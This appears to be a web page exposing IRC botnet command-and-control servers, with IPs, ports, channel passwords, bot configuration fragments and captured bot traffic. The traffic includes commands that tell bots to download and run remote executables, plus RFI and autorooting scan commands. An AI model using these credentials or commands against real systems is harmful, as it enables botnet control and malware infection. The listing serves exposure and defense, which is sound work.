linux bots inside var $config = array(“server”=>”188.116.52.163”, “port”=>”31336”, “pass”=>”haslo”, “prefix”=>”php”, “maxrand”=>”3”, “chan”=>”#php”, “chan2″=>”#php”, “key”=>””, “modes”=>”+ps”, “password”=>”haslo”, infos about hosting: http://whois.domaintools.com/188.116.52.163
server.gasbian.com(botnet hosted in United States Chicago Hostforweb Inc)
205.234.145.229:2345 Nick: New[AUT|00|P|35974] Username: XP-3032 Joined Channel: #!loco! Channel Topic for Channel #!loco!: “D http://ibe.am/images004?=” Private Message to Channel #!loco!: “[M]: Thread Activated: Sending Message With Email.” Private Message to Channel #!loco!: “[M]: Thread Disabled.” Private Message to User New[AUT|00|P|35974]: “.hp http://domredi.com/1/” infos about hosting: http://whois.domaintools.com/205.234.145.229
phython.no-ip.biz(botnet hosted in Korea, Republic Of Seoul Hanaro Telecom Inc)
Linux bots here from egyptian hecker my $fakeproc = “/usr/sbin/httpd”; my $ircserver = “phython.no-ip.biz”; my $ircport = “7000”; my $nickname = “BR[“.int(rand(100)).”]”; my $ident = “Bra”; my $channel = “#help”; my $admin = “Bjes”; scaning actions Now talking in #help Topic On: [ #help ] [ RFI][-][][ http://www.stanford.edu//?_SERVER[DOCUMENT_ROOT]= ] Topic By: [ Subali ] ModesRead more...
aaaaaaa.taybasoft.com(botnet hosted in China Beijing Ninbo Lanzhong Network Ltd)
Remote Host Port Number 112.78.112.208 80 218.85.133.201 80 89.114.9.42 80 89.114.9.60 80 123.183.217.32 1110 61.158.145.4 6939 PASS laorosr aaaaaaa.taybasoft.com TCP port 6939 PRIVMSG #d2 :Err0r.. PRIVMSG #d2 :Done.. MODE [N00_USA_XP_2208150] @ -ix # the data identified by the following URLs was then requested from the remote web server: * http://www.nippon.to/cgi-bin/prxjdg.cgi * http://www.cooleasy.com/cgi-bin/prxjdg.cgi * http://two.natnatraoi.com/ms.exe *Read more...
213.155.29.120(botnet hosted in Ukraine Parnoux – Arnoux Patrick)
213.155.29.120 Port: (6667) pass: (SelamS234) There are 0 users and 2496 invisible on 1 servers unknown connection(s) channels formed I have 2496 clients and 0 servers Current Local Users: 2496 Max: 5613 Current Global Users: 2496 Max: 2832 infos about hosting: http://whois.domaintools.com/213.155.29.120
x.equaldnshost.com(botnet hosted in United States San Francisco Comcast Business Communications Llc)
x.equaldnshost.com DNS_TYPE_A 85.159.70.238 112.148.210.36 112.171.41.101 173.164.198.129 85.159.70.238:9090 Nick: :{00-AUT-XP-pc6-6420} Username: MEAT Server Pass: prison Joined Channel: ###meat Joined Channel: ##hxxp## Channel Topic for Channel ###meat: “.p ###meat “ Channel Topic for Channel ##hxxp##: “.http http://115.93.29.155/mx.exe |.j ###meat “ Set by pe[ro on Mon Mar 14 13:58:51 Private Message to User {iNF-00-AUT-XP-p`xf6’yxf6’x82xf6’xa0xf8’=~@: “HTTP SET http://115.93.29.155/mx.exe” ProcessRead more...
capigroupe9.net(botnet hosted in United States Chicago Hostforweb Inc)
Remote Host Port Number 204.0.5.41 80 216.178.38.224 80 216.178.39.11 80 69.171.224.14 80 216.246.98.164 1866 PASS xxx NICK NEW-[USA|00|P|57896] USER XP-0495 * 0 :COMPUTERNAME MODE NEW-[USA|00|P|57896] -ix JOIN #!high! test PONG 22 MOTD infos about hosting: http://whois.domaintools.com/216.246.98.164
VistaSystem.yi.org(CCTEAM from israel botnet hosted in United States Eugene Eugene Freezing & Storage)
VistaSystem.yi.org:6667 Established.yi.org:6667 set %chan #Botland set %cpass fuckyouall nick=G|XP|M4Bs4 anick=dfgfdg host=Established.yi.orgSERVER:Established.yi.org:6667 set %chan #Establish set %cpass fuckyouall Resolved : [Established.yi.org] To [216.210.179.67] infos about hosting: http://whois.domaintools.com/216.210.179.67 open ports: listen *:6666; listen *:6667; listen *:6668; listen *:6669; listen *:7000; listen *:6000 this is main server of israeli heckers: link hideout.hub.ircnet.co.il { username *; hostname 210.75.6.2; bind-ipRead more...
tetova.myftp.org(botnet hosted in Brazil Sao Paulo Comite Gestor Da Internet No Brasil)
macedonian lamers using brasilian machine to scan for vnc tetova.myftp.org DNS_TYPE_A 189.74.131.100 189.74.131.100:6667 Nick: raGe|BdJeaNHNrv Username: igsasjs Joined Channel: #asc# with Password rage Channel Topic for Channel #asc#: “.xpl 75 1 24.x.x.x 3 1 24.x.x.x” Private Message to Channel #asc#: “^C14,1.:[^C15,1rAGEBoT^C14,1]:.^C15,1 range: 24.x.x.x with 75 threads. (autorooting)” infos about hosting: http://whois.domaintools.com/189.74.131.100
srv5500.com(snk ruski hecker did it again,Botnet hosted in Germany Ghostnet Gmbh)
host5500.net 94.249.188.107:5500 srv5500.com 94.249.188.107:5500 Now talking in #xux Topic On: [ #xux ] [ , ] Topic By: [ x ] (x) .dl ALL /125/115/124/115/38/48/62/125/82/118/43/106/122/73/115/107/111/67/127/116/113/96/105/108/84/57/113/96/55/120/122/105/77/118/50/64/98/111/ infos about hosting: http://whois.domaintools.com/94.249.188.107